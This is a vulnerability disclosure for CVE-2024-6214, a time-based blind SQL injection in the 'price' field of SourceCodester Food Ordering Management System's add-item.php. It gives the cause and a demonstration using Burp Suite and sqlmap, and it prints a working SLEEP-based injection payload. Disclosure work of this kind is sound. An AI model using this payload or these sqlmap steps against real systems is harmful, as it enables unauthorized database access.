CVE-2024-6214

SQL Injection vulnerability was discovered from Sourcecodester Food Ordering Management System 1.0 (add-item)

CVE-2024-6214

A vulnerability was found in SourceCodester Food Ordering Management System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file add-item.php. The manipulation of the argument price leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-269278 is the identifier assigned to this vulnerability.

Affected Project: Sourcecodester Food Ordering Management System 1.0

Official Website: https://www.sourcecodester.com/php/15689/food-ordering-management-system-php-and-mysql-free-source-code.html

Version: 1.0

Related Code file: /router/add-item.php

Injection parameter: price

Vulnerability Analysis

1. Lack of Input Validation and Sanitization: The price and name fields are directly used in the SQL query without any sanitization or validation. This allows an attacker to manipulate the SQL query by injecting malicious SQL code.

2. Use of Plain SQL Queries: The script likely uses plain SQL queries to interact with the database. Without prepared statements, this approach is highly vulnerable to SQL injection.

Demonstraation

Below is the admin-page.php. By clicking on Add, we can access add-item.php.

http://172.16.76.1/foms/admin-page.php

We will first intercept the add-item traffic using Burp Suite:

Save the intercepted add-item request to a .txt file and execute sqlmap towards it.

parameter price is vulnerable to time-based blind sql injection

Below commands verifies the vulnerability:

sqlmap -r foms-add-item.txt --batch

---
Parameter: price (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: name=asdafsd&price=123 AND (SELECT 1175 FROM (SELECT(SLEEP(5)))jrgF)&action=
---